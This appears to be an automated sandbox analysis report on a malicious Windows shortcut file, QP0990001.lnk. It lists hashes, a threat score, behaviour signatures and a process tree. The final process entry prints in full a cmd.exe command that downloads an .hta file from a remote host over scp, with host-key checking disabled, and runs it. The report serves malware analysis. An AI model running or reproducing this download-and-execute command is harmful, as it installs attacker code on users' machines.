Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
03-10-2023 09:57
Static task
static1
Behavioral task
behavioral1
Sample
QP0990001.lnk
Resource
win7-20230831-en
windows7-x64
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
QP0990001.lnk
Resource
win10v2004-20230915-en
windows10-2004-x64
19 signatures
150 seconds
General
-
Target
QP0990001.lnk
-
Size
2KB
-
MD5
c23a4b2e392af2535198428aafcbc7a4
-
SHA1
02a472fb5f6be33044c51420b6fa98fe3adf6251
-
SHA256
81b9e6ecd9d94421b7bef50c53e109e15927b3fdfb5068f51a742b662a7deaad
-
SHA512
17172ade2ef629d2b878635015a6bcbc73464737b51fc7312b1b6ffc76ea238a568bae3f479c8e2f5ef775404681d731c8217cdb6249fad8a5db98902ea00747
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2972 wrote to memory of 2220 2972 cmd.exe cmd.exe PID 2972 wrote to memory of 2220 2972 cmd.exe cmd.exe PID 2972 wrote to memory of 2220 2972 cmd.exe cmd.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\QP0990001.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "scp -o StrictHostKeyChecking=no [email protected]:/aa/DZZ C:\Users\Admin\AppData\Roaming\eeMT.hta" & C:\Users\Admin\AppData\Roaming\eeMT.hta2⤵PID:2220